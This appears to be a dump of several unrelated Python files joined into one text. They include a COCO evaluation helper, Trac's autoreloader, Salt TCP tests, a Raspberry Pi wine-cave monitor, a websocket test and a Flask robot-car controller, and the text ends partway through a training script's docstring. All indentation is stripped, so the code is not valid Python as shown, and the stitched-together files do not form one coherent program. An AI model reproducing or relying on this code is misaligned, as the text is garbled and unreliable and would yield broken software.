"""Use multiprocess to perform COCO metric evaluation.
"""
# copybara:insert import multiprocessing
from REDACTED.mask_rcnn import mask_rcnn_params
from REDACTED.mask_rcnn import segm_utils
# copybara:strip_begin
from REDACTED.REDACTED.multiprocessing import REDACTEDprocess
# copybara:strip_end
# copybara:strip_begin
def REDACTED_post_processing():
"""REDACTED batch-processes the predictions."""
q_in, q_out = REDACTEDprocess.get_user_data()
post_processing(q_in, q_out)
# copybara:strip_end
def post_processing(q_in, q_out):
"""Batch-processes the predictions."""
boxes, masks, image_info = q_in.get()
while boxes is not None:
detections = []
segmentations = []
for i, box in enumerate(boxes):
# Slice out the padding data where score is zero
num = max(1, sum(box[:, 5] > 0))
box = box[:num, :]
segms = segm_utils.segm_results(
masks[i], box[:, 1:5], int(image_info[i][3]), int(image_info[i][4]))
detections.extend(box)
segmentations.append(segms)
q_out.put((detections, segmentations))
boxes, masks, image_info = q_in.get()
# signal the parent process that we have completed all work.
q_out.put((None, None))
def update_eval_metric(q_out, eval_metric, exited_process):
detections, segmentations = q_out.get()
if detections is None and segmentations is None:
exited_process += 1
else:
eval_metric.update(detections, segmentations)
return exited_process
def eval_multiprocessing(predictions,
eval_metric,
eval_worker_count,
queue_size=mask_rcnn_params.QUEUE_SIZE):
"""Enables multiprocessing to update eval metrics."""
# copybara:strip_begin
q_in, q_out = REDACTEDprocess.get_user_data()
processes = [
REDACTEDprocess.Process(target=REDACTED_post_processing)
for _ in range(eval_worker_count)
]
# copybara:strip_end_and_replace_begin
# q_in = multiprocessing.Queue(maxsize=queue_size)
# q_out = multiprocessing.Queue(maxsize=queue_size)
# processes = [
# multiprocessing.Process(target=post_processing, args=(q_in, q_out))
# for _ in range(eval_worker_count)
# ]
# copybara:replace_end
for p in processes:
p.start()
# TODO(b/129410706): investigate whether threading improves speed.
# Every predictor.next() gets a batch of prediction (a dictionary).
exited_process = 0
samples = len(predictions['detections']) // eval_worker_count
for i in range(eval_worker_count):
while q_in.full() or q_out.qsize() > queue_size // 4:
exited_process = update_eval_metric(q_out, eval_metric, exited_process)
q_in.put((predictions['detections'][i * samples:(i + 1) * samples],
predictions['mask_outputs'][i * samples:(i + 1) * samples],
predictions['image_info'][i * samples:(i + 1) * samples]))
# Adds empty items to signal the children to quit.
for _ in processes:
q_in.put((None, None, None))
# Cleans up q_out and waits for all the processes to finish work.
while not q_out.empty() or exited_process < eval_worker_count:
exited_process = update_eval_metric(q_out, eval_metric, exited_process)
for p in processes:
# actively terminate all processes (to work around the multiprocessing
# deadlock issue in Cloud)
# copybara:insert p.terminate()
p.join()
|
autoreload.py | # -*- coding: utf-8 -*-
#
# Copyright (C)2006-2009 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
import os
import sys
import threading
import time
import traceback
_SLEEP_TIME = 1
def _reloader_thread(modification_callback, loop_callback):
"""When this function is run from the main thread, it will force other
threads to exit when any modules currently loaded change.
@param modification_callback: a function taking a single argument, the
modified file, which is called every time a modification is detected
@param loop_callback: a function taking no arguments, which is called
after every modification check
"""
mtimes = {}
while True:
for filename in filter(None, [getattr(module, '__file__', None)
for module in sys.modules.values()]):
while not os.path.isfile(filename): # Probably in an egg or zip file
filename = os.path.dirname(filename)
if not filename:
break
if not filename: # Couldn't map to physical file, so just ignore
continue
if filename.endswith(('.pyc', '.pyo')):
filename = filename[:-1]
if not os.path.isfile(filename):
# Compiled file for non-existant source
continue
mtime = os.stat(filename).st_mtime
if filename not in mtimes:
mtimes[filename] = mtime
continue
if mtime != mtimes[filename]:
modification_callback(filename)
sys.exit(3)
loop_callback()
time.sleep(_SLEEP_TIME)
def _restart_with_reloader():
while True:
args = [sys.executable] + sys.argv
if sys.platform == 'win32':
args = ['"%s"' % arg for arg in args]
new_environ = os.environ.copy()
new_environ['RUN_MAIN'] = 'true'
# This call reinvokes ourself and goes into the other branch of main as
# a new process.
exit_code = os.spawnve(os.P_WAIT, sys.executable,
args, new_environ)
if exit_code != 3:
return exit_code
def main(func, modification_callback, *args, **kwargs):
"""Run the given function and restart any time modules are changed."""
if os.environ.get('RUN_MAIN'):
exit_code = []
def main_thread():
try:
func(*args, **kwargs)
exit_code.append(None)
except SystemExit, e:
exit_code.append(e.code)
except:
traceback.print_exception(*sys.exc_info())
exit_code.append(1)
def check_exit():
if exit_code:
sys.exit(exit_code[0])
# Lanch the actual program as a child thread
thread = threading.Thread(target=main_thread, name='Main thread')
thread.setDaemon(True)
thread.start()
try:
# Now wait for a file modification and quit
_reloader_thread(modification_callback, check_exit)
except KeyboardInterrupt:
pass
else:
# Initial invocation just waits around restarting this executable
try:
sys.exit(_restart_with_reloader())
except KeyboardInterrupt:
pass
|
neuralet-distancing.py | #!/usr/bin/python3
import argparse
from multiprocessing import Process
import threading
from libs.config_engine import ConfigEngine
import libs.pubsub
import logging
logger = logging.getLogger(__name__)
def start_engine(config, video_path):
from libs.core import Distancing as CvEngine
engine = CvEngine(config)
engine.process_video(video_path)
def start_web_gui(config):
from ui.web_gui import WebGUI
ui = WebGUI(config)
ui.start()
def main(config):
logging.basicConfig(level=logging.INFO)
if isinstance(config, str):
config = ConfigEngine(config)
libs.pubsub.init_shared_resources()
video_path = config.get_section_dict("App")["VideoPath"]
process_engine = Process(target=start_engine, args=(config, video_path,))
process_api = Process(target=start_web_gui, args=(config,))
process_api.start()
process_engine.start()
logger.info("Services Started.")
forever = threading.Event()
try:
forever.wait()
except KeyboardInterrupt:
logger.info("Received interrupt. Terminating...")
process_engine.terminate()
process_engine.join()
logger.info("CV Engine terminated.")
process_api.terminate()
process_api.join()
logger.info("Web GUI terminated.")
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--config', required=True)
args = parser.parse_args()
main(args.config)
|
test_tcp.py | # -*- coding: utf-8 -*-
'''
:codeauthor: Thomas Jackson <jacksontj.89@gmail.com>
'''
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import threading
import tornado.gen
import tornado.ioloop
import tornado.concurrent
from tornado.testing import AsyncTestCase, gen_test
import salt.config
from salt.ext import six
import salt.utils.platform
import salt.utils.process
import salt.transport.server
import salt.transport.client
import salt.exceptions
from salt.ext.six.moves import range
from salt.transport.tcp import SaltMessageClientPool
# Import Salt Testing libs
from tests.support.unit import TestCase, skipIf
from tests.support.helpers import get_unused_localhost_port, flaky
from tests.support.mixins import AdaptedConfigurationTestCaseMixin
from tests.support.mock import MagicMock, patch
from tests.unit.transport.mixins import PubChannelMixin, ReqChannelMixin
class BaseTCPReqCase(TestCase, AdaptedConfigurationTestCaseMixin):
'''
Test the req server/client pair
'''
@classmethod
def setUpClass(cls):
if not hasattr(cls, '_handle_payload'):
return
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
'master',
**{'transport': 'tcp',
'auto_accept': True,
'ret_port': ret_port,
'publish_port': publish_port,
'tcp_master_pub_port': tcp_master_pub_port,
'tcp_master_pull_port': tcp_master_pull_port,
'tcp_master_publish_pull': tcp_master_publish_pull,
'tcp_master_workers': tcp_master_workers}
)
cls.minion_config = cls.get_temp_config(
'minion',
**{'transport': 'tcp',
'master_ip': '127.0.0.1',
'master_port': ret_port,
'master_uri': 'tcp://127.0.0.1:{0}'.format(ret_port)}
)
cls.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager')
cls.server_channel = salt.transport.server.ReqServerChannel.factory(cls.master_config)
cls.server_channel.pre_fork(cls.process_manager)
cls.io_loop = tornado.ioloop.IOLoop()
def run_loop_in_thread(loop):
loop.make_current()
loop.start()
cls.server_channel.post_fork(cls._handle_payload, io_loop=cls.io_loop)
cls.server_thread = threading.Thread(target=run_loop_in_thread, args=(cls.io_loop,))
cls.server_thread.daemon = True
cls.server_thread.start()
@classmethod
def tearDownClass(cls):
if not hasattr(cls, '_handle_payload'):
return
if hasattr(cls, 'io_loop'):
cls.io_loop.add_callback(cls.io_loop.stop)
cls.server_thread.join()
cls.process_manager.kill_children()
cls.server_channel.close()
del cls.server_channel
@classmethod
@tornado.gen.coroutine
def _handle_payload(cls, payload):
'''
TODO: something besides echo
'''
raise tornado.gen.Return((payload, {'fun': 'send_clear'}))
@skipIf(salt.utils.platform.is_darwin(), 'hanging test suite on MacOS')
class ClearReqTestCases(BaseTCPReqCase, ReqChannelMixin):
'''
Test all of the clear msg stuff
'''
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(self.minion_config, crypt='clear')
def tearDown(self):
del self.channel
@classmethod
@tornado.gen.coroutine
def _handle_payload(cls, payload):
'''
TODO: something besides echo
'''
raise tornado.gen.Return((payload, {'fun': 'send_clear'}))
@skipIf(salt.utils.platform.is_darwin(), 'hanging test suite on MacOS')
class AESReqTestCases(BaseTCPReqCase, ReqChannelMixin):
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(self.minion_config)
def tearDown(self):
del self.channel
@classmethod
@tornado.gen.coroutine
def _handle_payload(cls, payload):
'''
TODO: something besides echo
'''
raise tornado.gen.Return((payload, {'fun': 'send'}))
# TODO: make failed returns have a specific framing so we can raise the same exception
# on encrypted channels
@flaky
def test_badload(self):
'''
Test a variety of bad requests, make sure that we get some sort of error
'''
msgs = ['', [], tuple()]
for msg in msgs:
with self.assertRaises(salt.exceptions.AuthenticationError):
ret = self.channel.send(msg)
class BaseTCPPubCase(AsyncTestCase, AdaptedConfigurationTestCaseMixin):
'''
Test the req server/client pair
'''
@classmethod
def setUpClass(cls):
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
'master',
**{'transport': 'tcp',
'auto_accept': True,
'ret_port': ret_port,
'publish_port': publish_port,
'tcp_master_pub_port': tcp_master_pub_port,
'tcp_master_pull_port': tcp_master_pull_port,
'tcp_master_publish_pull': tcp_master_publish_pull,
'tcp_master_workers': tcp_master_workers}
)
cls.minion_config = cls.get_temp_config(
'minion',
**{'transport': 'tcp',
'master_ip': '127.0.0.1',
'auth_timeout': 1,
'master_port': ret_port,
'master_uri': 'tcp://127.0.0.1:{0}'.format(ret_port)}
)
cls.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager')
cls.server_channel = salt.transport.server.PubServerChannel.factory(cls.master_config)
cls.server_channel.pre_fork(cls.process_manager)
# we also require req server for auth
cls.req_server_channel = salt.transport.server.ReqServerChannel.factory(cls.master_config)
cls.req_server_channel.pre_fork(cls.process_manager)
cls._server_io_loop = tornado.ioloop.IOLoop()
cls.req_server_channel.post_fork(cls._handle_payload, io_loop=cls._server_io_loop)
def run_loop_in_thread(loop):
loop.make_current()
loop.start()
cls.server_thread = threading.Thread(target=run_loop_in_thread, args=(cls._server_io_loop,))
cls.server_thread.daemon = True
cls.server_thread.start()
@classmethod
def _handle_payload(cls, payload):
'''
TODO: something besides echo
'''
return payload, {'fun': 'send_clear'}
@classmethod
def tearDownClass(cls):
cls._server_io_loop.add_callback(cls._server_io_loop.stop)
cls.server_thread.join()
cls.process_manager.kill_children()
cls.req_server_channel.close()
del cls.req_server_channel
def setUp(self):
super(BaseTCPPubCase, self).setUp()
self._start_handlers = dict(self.io_loop._handlers)
def tearDown(self):
super(BaseTCPPubCase, self).tearDown()
failures = []
for k, v in six.iteritems(self.io_loop._handlers):
if self._start_handlers.get(k) != v:
failures.append((k, v))
if len(failures) > 0:
raise Exception('FDs still attached to the IOLoop: {0}'.format(failures))
del self.channel
del self._start_handlers
@skipIf(True, 'Skip until we can devote time to fix this test')
class AsyncPubChannelTest(BaseTCPPubCase, PubChannelMixin):
'''
Tests around the publish system
'''
class SaltMessageClientPoolTest(AsyncTestCase):
def setUp(self):
super(SaltMessageClientPoolTest, self).setUp()
sock_pool_size = 5
with patch('salt.transport.tcp.SaltMessageClient.__init__', MagicMock(return_value=None)):
self.message_client_pool = SaltMessageClientPool({'sock_pool_size': sock_pool_size},
args=({}, '', 0))
self.original_message_clients = self.message_client_pool.message_clients
self.message_client_pool.message_clients = [MagicMock() for _ in range(sock_pool_size)]
def tearDown(self):
with patch('salt.transport.tcp.SaltMessageClient.close', MagicMock(return_value=None)):
del self.original_message_clients
super(SaltMessageClientPoolTest, self).tearDown()
def test_send(self):
for message_client_mock in self.message_client_pool.message_clients:
message_client_mock.send_queue = [0, 0, 0]
message_client_mock.send.return_value = []
self.assertEqual([], self.message_client_pool.send())
self.message_client_pool.message_clients[2].send_queue = [0]
self.message_client_pool.message_clients[2].send.return_value = [1]
self.assertEqual([1], self.message_client_pool.send())
def test_write_to_stream(self):
for message_client_mock in self.message_client_pool.message_clients:
message_client_mock.send_queue = [0, 0, 0]
message_client_mock._stream.write.return_value = []
self.assertEqual([], self.message_client_pool.write_to_stream(''))
self.message_client_pool.message_clients[2].send_queue = [0]
self.message_client_pool.message_clients[2]._stream.write.return_value = [1]
self.assertEqual([1], self.message_client_pool.write_to_stream(''))
def test_close(self):
self.message_client_pool.close()
self.assertEqual([], self.message_client_pool.message_clients)
def test_on_recv(self):
for message_client_mock in self.message_client_pool.message_clients:
message_client_mock.on_recv.return_value = None
self.message_client_pool.on_recv()
for message_client_mock in self.message_client_pool.message_clients:
self.assertTrue(message_client_mock.on_recv.called)
def test_connect_all(self):
@gen_test
def test_connect(self):
yield self.message_client_pool.connect()
for message_client_mock in self.message_client_pool.message_clients:
future = tornado.concurrent.Future()
future.set_result('foo')
message_client_mock.connect.return_value = future
self.assertIsNone(test_connect(self))
def test_connect_partial(self):
@gen_test(timeout=0.1)
def test_connect(self):
yield self.message_client_pool.connect()
for idx, message_client_mock in enumerate(self.message_client_pool.message_clients):
future = tornado.concurrent.Future()
if idx % 2 == 0:
future.set_result('foo')
message_client_mock.connect.return_value = future
with self.assertRaises(tornado.ioloop.TimeoutError):
test_connect(self)
|
winecave.py | #coding: utf-8
import common as com
import datetime as dt
import json
import hashlib
import mail
import os
import requests
import sensor as s
import threading
import time
import uptime
last_alerted = 0
last_reported = 0
QUEUE = '/opt/winecave/queue/'
def enqueue(obj):
try:
with open('{0}{1}'.format(QUEUE, hashlib.md5(str(obj).encode()).hexdigest()), 'w') as f:
f.write(json.dumps(obj))
except Exception as e:
com.error(traceback.format_exc())
com.error(str(e))
def regist_data(type, value):
api_url = 'http://edisoner.com/api/regist2.php'
headers = {'content-type': 'application/json'}
payload = {'type': type, 'value': round(value, 2), 'timestamp': dt.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}
enqueue(payload)
# response = requests.post(api_url, data=json.dumps(payload), headers=headers)
# com.info('response: {0}'.format(response.text))
def alert():
global last_alerted
# エラー発報は1時間に1回とする
if time.time() - last_alerted > 3600:
subject = 'sensor error [{0}]'.format(dt.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
body_text = 'I2C Error occured.'
mail.sendmail('koichi.inokuchi@gmail.com', subject, body_text)
last_alerted = time.time()
com.warn('alert mail fired !')
def report(t, h):
global last_reported
# 通知1時間に1回とする
if time.time() - last_reported > 3595:
stat = os.statvfs('/')
free = int(stat.f_bavail * stat.f_frsize // 1024 // 1024)
total = int(stat.f_blocks * stat.f_frsize // 1024 // 1024)
used = int((stat.f_blocks - stat.f_bfree) * stat.f_frsize // 1024 //1024)
subject = '[{0}] sensor status report'.format(dt.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
body_text = []
body_text.append('sensor status at {0}'.format(dt.datetime.now().strftime('%Y-%m-%d %H:%M:%S')))
body_text.append(' system uptime: {0:d} days {1:d} hour {2:d} min'.format(
int(uptime.uptime()//86400),
int(uptime.uptime()%86400//3600),
int(uptime.uptime()%3600//60)))
body_text.append(' file system total: {0:,d} MB'.format(total))
body_text.append(' file system used : {0:,d} MB ({1:.1f}%)'.format(used, used * 100 / total))
body_text.append(' file system avail: {0:,d} MB ({1:.1f}%)'.format(free, free * 100 / total))
body_text.append(' temperature : {0:.2f} C'.format(t))
body_text.append(' humidity : {0:.2f} %'.format(h))
mail.sendmail('koichi.inokuchi@gmail.com', subject, '\n'.join(body_text))
last_reported = time.time()
com.info('report mail fired !')
else:
com.info('report mail skiped !')
def process():
t = s.get_temperature()
error = False
if t != s.ERROR:
regist_data('T', t)
com.info('{0:.2f} C'.format(t))
else:
com.error('I2C error')
error = True
p = s.get_pressure()
if p != s.ERROR:
regist_data('P', p)
com.info('{0:.2f} hPa'.format(p))
else:
com.error('I2C error')
error = True
h = s.get_humidity()
if h != s.ERROR:
regist_data('H', h)
com.info('{0:.2f} %'.format(h))
else:
com.error('I2C error')
error = True
if error:
alert()
else:
report(t, h)
com.info('-' * 60)
# ------------------------------------------------------------------------------
# program main
com.info('----- Wine cave monitor started.')
if __name__ == '__main__':
com.info('Wine cave monitor started.')
AJUST = 0.060
while True:
t0 = time.time()
th = threading.Thread(target=process)
th.start()
t1 = time.time()
com.info('sleep for {0:.6f} seconds'.format(60 - (t1 - t0) - AJUST))
time.sleep(60 - (t1 - t0) - AJUST)
|
test_websocket_provider.py | import asyncio
import pytest
import sys
from threading import (
Thread,
)
import websockets
from tests.utils import (
wait_for_ws,
)
from platon import Web3
from platon.exceptions import (
ValidationError,
)
from platon.providers.websocket import (
WebsocketProvider,
)
if sys.version_info >= (3, 8):
from asyncio.exceptions import (
TimeoutError,
)
else:
from concurrent.futures import (
TimeoutError,
)
@pytest.yield_fixture
def start_websocket_server(open_port):
event_loop = asyncio.new_event_loop()
def run_server():
async def empty_server(websocket, path):
data = await websocket.recv()
await asyncio.sleep(0.02)
await websocket.send(data)
server = websockets.serve(empty_server, '127.0.0.1', open_port, loop=event_loop)
event_loop.run_until_complete(server)
event_loop.run_forever()
thd = Thread(target=run_server)
thd.start()
try:
yield
finally:
event_loop.call_soon_threadsafe(event_loop.stop)
@pytest.fixture()
def w3(open_port, start_websocket_server):
# need new event loop as the one used by server is already running
event_loop = asyncio.new_event_loop()
endpoint_uri = 'ws://127.0.0.1:{}'.format(open_port)
event_loop.run_until_complete(wait_for_ws(endpoint_uri, event_loop))
provider = WebsocketProvider(endpoint_uri, websocket_timeout=0.01)
return Web3(provider)
def test_websocket_provider_timeout(w3):
with pytest.raises(TimeoutError):
w3.platon.accounts
def test_restricted_websocket_kwargs():
invalid_kwargs = {'uri': 'ws://127.0.0.1:8546'}
re_exc_message = r'.*found: {0}*'.format(set(invalid_kwargs.keys()))
with pytest.raises(ValidationError, match=re_exc_message):
WebsocketProvider(websocket_kwargs=invalid_kwargs)
|
myrobot.py | #!/usr/bin/python
#-*- coding: utf-8 -*-
import os
from importlib import import_module
from flask import Flask, render_template, Response
from flask import render_template
from flask import request
from flask import abort, redirect, url_for
from flask import render_template
from flask import session, escape
from flask import g, flash
from flask import send_from_directory
from flask import jsonify
import json
from time import sleep
import io
from camera_pi import Camera
import logging
from threading import Condition
from camera_pi import Camera
import threading
HEADLIGHT = 3
L_LED = 29
R_LED = 31
B_MOTOR_A = 35
B_MOTOR_B = 37
F_MOTOR_A = 38
F_MOTOR_B = 40
def init_gpio():
try:
print("initialize gpio... ")
GPIO.cleanup()
GPIO.setmode( GPIO.BOARD )
GPIO.setup( HEADLIGHT, GPIO.OUT )
GPIO.setup( L_LED, GPIO.OUT )
GPIO.setup( R_LED, GPIO.OUT )
GPIO.setup( B_MOTOR_A, GPIO.OUT )
GPIO.setup( B_MOTOR_B, GPIO.OUT )
GPIO.setup( F_MOTOR_A, GPIO.OUT )
GPIO.setup( F_MOTOR_B, GPIO.OUT )
except:
pass
pass
try:
import RPi.GPIO as GPIO
except:
print("not found gpio library")
import time
import threading
from threading import Timer
import datetime
app = Flask( __name__ )
app.debug = True
app.config.from_object(__name__)
class Ubaba:
def __init__(self):
print('''
--- UBABA Initialize... ---
''')
self.duty = 0
self.freq = 100
self.acceleration = False # 가속중인가?
self.brake = False # 브레이크
self.gear = 0 # 기어(주행방향) -1: 후진 0:정지 1:1단 2:2단 3:3단 4:4단 5:5단
self.acceleration_rate = 4 # 2 Duty/sec 초당 1duty씩 증가
self.reduction_rate = 2 # 1 Duty/sec 초당 2duty씩 감소
self.direction = 0 # 조향방향. 0:center 1:left 2:right
self.current_duty = 0 # 현재속도
self.target_duty = 0 # 목표속도. 가속중이라면 기어에 해당하는 최고속도, 감속중이라면 0
self.gear_duty = { -1:60, 0:0, 1:50, 2:60, 3:70, 4:80, 5:90 } # 기어별 목표속도
self.F_MOTOR_A = 38
self.F_MOTOR_B = 40
self.B_MOTOR_A = 37
self.B_MOTOR_B = 35
self.F_LED = 3
self.f_led_thread_running = False
GPIO.cleanup()
GPIO.setmode( GPIO.BOARD )
GPIO.setup( self.F_MOTOR_A, GPIO.OUT )
GPIO.setup( self.F_MOTOR_B, GPIO.OUT )
GPIO.setup( self.F_LED, GPIO.OUT )
GPIO.output( self.F_MOTOR_A, False )
GPIO.output( self.F_MOTOR_B, False )
GPIO.output( self.F_LED, True )
GPIO.setup( self.B_MOTOR_A, GPIO.OUT )
GPIO.setup( self.B_MOTOR_B, GPIO.OUT )
GPIO.output( self.B_MOTOR_A, False )
GPIO.output( self.B_MOTOR_B, False )
self.pwm_F = GPIO.PWM( self.F_MOTOR_B, 10)
self.pwm_B = GPIO.PWM( self.F_MOTOR_A, 10)
self.pwm_L = GPIO.PWM(self.B_MOTOR_A, 60)
self.pwm_R = GPIO.PWM(self.B_MOTOR_B, 60)
self.pwm_F_LED = GPIO.PWM( self.F_LED, 100)
print(" init Ubaba class ")
self.enable_work_thread = False
self.is_running_work_thread = False
def start_work(self):
print("start_work")
if self.is_running_work_thread == True:
print("work_thread already running. return ")
return
self.enable_work_thread = True
self.work_thread = threading.Thread( target = self.work, args=(1,))
self.work_thread.daemon = True
self.work_thread.start()
def stop_work(self):
print("stop_work")
self.enable_work_thread = False
def work(self, arg1):
print("주행쓰레드시작")
self.is_running_work_thread = True
count = 0
self.pwm_F.start(0)
self.pwm_B.start(0)
while self.enable_work_thread == True:
sleep(0.5)
count = count +1
# 기어의 상태에 따른 움직임
# 기어비에 따른 목표속도 설정.
# 가속중인지에따라 현재 속도를 목료속도로 증가
self.target_duty = self.gear_duty[ self.gear ]
# print("current duty:{} target_duty:{} acceleration_rate:{}".format( self.current_duty, self.target_duty, self.acceleration_rate ));
# 현재속도가 목표속도보다 낮은 경우
if self.current_duty < self.target_duty:
if self.acceleration == True:
# 가속중이라면 가속 비율만큼 가속한다
self.current_duty = self.current_duty + self.acceleration_rate
else:
# 가속중이 아니라면 감속한다
if self.current_duty > 0:
self.current_duty = self.current_duty - self.reduction_rate
else:
# 현재속도가 목표속도보다 높은 경우, 목표속도까지 감속한다.
self.current_duty = self.current_duty - self.reduction_rate
# 브레이크시 현재속도 초기화
if self.brake == True:
self.current_duty = 0
if self.current_duty < 0:
self.current_duty = 0
if self.gear != -1:
# pwm에 현재속도 duty비 적용
self.pwm_F.start(0)
self.pwm_B.stop()
self.pwm_F.ChangeDutyCycle( self.current_duty )
self.pwm_B.ChangeDutyCycle( 0 )
GPIO.output( self.F_MOTOR_A, False )
elif self.gear == -1:
self.pwm_F.stop()
self.pwm_B.start(0)
self.pwm_F.ChangeDutyCycle( 90 )
self.pwm_B.ChangeDutyCycle( self.current_duty )
GPIO.output( self.F_MOTOR_B, False )
print("주행쓰레드종료")
self.is_running_work_thread = False
def f_led(self, onoff, level = 1):
print(" F_LED onoff:{} level:{}".format(onoff, level))
if onoff == True:
self.pwm_F_LED.start(0)
self.pwm_F_LED.ChangeDutyCycle(20 * level)
else:
self.pwm_F_LED.ChangeDutyCycle(100)
self.pwm_F_LED.stop()
sleep(0.1)
GPIO.setup( self.F_LED, GPIO.OUT )
GPIO.output( self.F_LED, True )
def start_f_led_blink(self):
if self.f_led_thread_running == True:
print("이미 쓰레드가 실행중입니다.")
return
self.f_led_thread = threading.Thread( target = self.f_led_work, args=(1, 2))
self.f_led_thread.daemon = True
self.f_led_thread.start()
def f_led_work( self, arg1, arg2 ):
print(" f_led_work ")
self.f_led_thread_running = True
self.pwm_F_LED.start(0)
for k in range(0,10):
for i in range(0, 100, 5):
self.pwm_F_LED.ChangeDutyCycle(100-i)
sleep(0.01)
for i in range(0, 100, 5):
self.pwm_F_LED.ChangeDutyCycle(i)
sleep(0.01)
self.pwm_F_LED.ChangeDutyCycle(100)
self.pwm_F_LED.stop()
sleep(0.1)
GPIO.setup( self.F_LED, GPIO.OUT )
GPIO.output( self.F_LED, True )
self.f_led_thread_running = False
print(" f_led_work ended ")
def motor_forward(self, duty= 40):
print("motor forward")
GPIO.output( self.F_MOTOR_B, False )
self.pwm_B.start(duty)
self.pwm_B.ChangeDutyCycle(duty)
pass
def motor_backward(self, duty = 30):
print("motor backward")
GPIO.output( self.F_MOTOR_A, False )
self.pwm_F.start(duty)
self.pwm_F.ChangeDutyCycle(duty)
pass
def motor_stop(self):
print("motor stop")
GPIO.output( self.F_MOTOR_A, False )
GPIO.output( self.F_MOTOR_B, False )
self.pwm_F.stop()
self.pwm_B.stop()
pass
def turn_left(self, duty = 100):
GPIO.output( self.B_MOTOR_A, False )
self.pwm_R.start(duty)
self.pwm_R.ChangeDutyCycle(duty)
pass
def turn_right(self, duty = 100):
GPIO.output( self.B_MOTOR_B, False )
self.pwm_L.start(duty)
self.pwm_L.ChangeDutyCycle(duty)
pass
def turn_center(self):
GPIO.output( self.B_MOTOR_A, False )
GPIO.output( self.B_MOTOR_B, False )
self.pwm_L.stop()
self.pwm_R.stop()
pass
def warming_up(self):
self.motor_stop()
sleep(0.1)
self.motor_forward()
sleep(0.2)
self.motor_backward()
sleep(0.2)
self.motor_stop()
sleep(0.1)
self.turn_left()
sleep(0.1)
self.turn_center()
sleep(0.1)
self.turn_right()
sleep(0.1)
self.turn_center()
return
ubaba = Ubaba()
ubaba.motor_stop()
ubaba.warming_up()
@app.route('/work_thread_enable', methods=['POST'])
def work_therad_enable():
enable = request.form['enable']
print(" enable : {}".format(enable))
if enable == 'true':
ubaba.start_work()
else:
ubaba.stop_work()
return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
@app.route('/get_status', methods=['POST'])
def get_status():
data = {
'is_running_work_thread': ubaba.is_running_work_thread,
'acceleration': ubaba.acceleration,
'brake': ubaba.brake,
'gear': ubaba.gear,
'acceleration_rate': ubaba.acceleration_rate,
'reduction_rate': ubaba.reduction_rate,
'direction': ubaba.direction,
'current_duty': ubaba.current_duty,
'target_duty': ubaba.target_duty }
return jsonify(data)
@app.route('/gear', methods=['POST'])
def gear():
gear_val = int(request.form['gear_value'])
ubaba.gear = gear_val
return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
@app.route('/acceleration', methods=['POST'])
def acceleration():
ubaba.acceleration = (request.form['onoff'] == 'true')
return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
@app.route('/brake', methods=['POST'])
def brake():
ubaba.brake = (request.form['onoff'] == 'true')
return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
@app.route('/headlight', methods=['POST'])
def headlight():
onoff = request.form['turnon']
ubaba.f_led(onoff == '0')
return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
@app.route('/blink_led', methods=['POST'])
def blink_led():
interval = float(request.form['interval'])
count = int(request.form['count'])
ubaba.start_f_led_blink()
return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
@app.route('/motor', methods=['POST'])
def motor():
GPIO.setmode(GPIO.BOARD)
run = request.form['run']
turn = request.form['turn']
if run == 'forward':
ubaba.motor_backward(60)
elif run == 'backward':
ubaba.motor_forward(60)
elif run == 'stop':
ubaba.motor_stop()
if turn == 'left':
ubaba.turn_left()
sleep(0.5)
ubaba.turn_center()
elif turn == 'right':
ubaba.turn_right()
sleep(0.5)
ubaba.turn_center()
elif turn == 'center':
ubaba.turn_center()
return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
@app.route('/run', methods=['POST'])
def run():
duty = float(request.form['duty'])
print("run. duty:", duty )
ubaba.motor_forward(duty)
return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
@app.route('/stop', methods=['POST'])
def stop():
ubaba.motor_stop()
return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
@app.route('/view_stream')
def view_stream():
return render_template('view_stream.html')
def gen(camera):
print("hasiho init!!!!!!");
while True:
frame = camera.get_frame()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
@app.route('/video_feed')
def video_feed():
ret = Response(gen(Camera()), mimetype='multipart/x-mixed-replace; boundary=frame')
print(ret)
return ret
@app.route('/')
def index_page():
# init_gpio()
GPIO.setmode(GPIO.BOARD)
GPIO.setup( F_MOTOR_B, GPIO.OUT )
GPIO.output( F_MOTOR_B, False )
GPIO.setup( F_MOTOR_A, GPIO.OUT )
pwm = GPIO.PWM( F_MOTOR_A, 30 )
pwm.start( 30 )
return render_template('index.html')
if __name__ == '__main__':
app.run(use_reloader=True, debug=True, host='0.0.0.0')
|
train_ctrl_exp.py | """
Trains controller and the explorer, based on --explorer.
Calls the RolloutGenerator, which generates rollouts and the asssociated rewards for either controller or explorer.
Controller retuurns sum of discounted rewards, explorer returns sum of undiscounted model reconstruction error (see utils.misc)
Trains linear controller and explorer on latent + recurrent state with CMAES.
This is a bit complex. num_workers slave threads are launched
to process a queue filled with parameters to be evaluated.
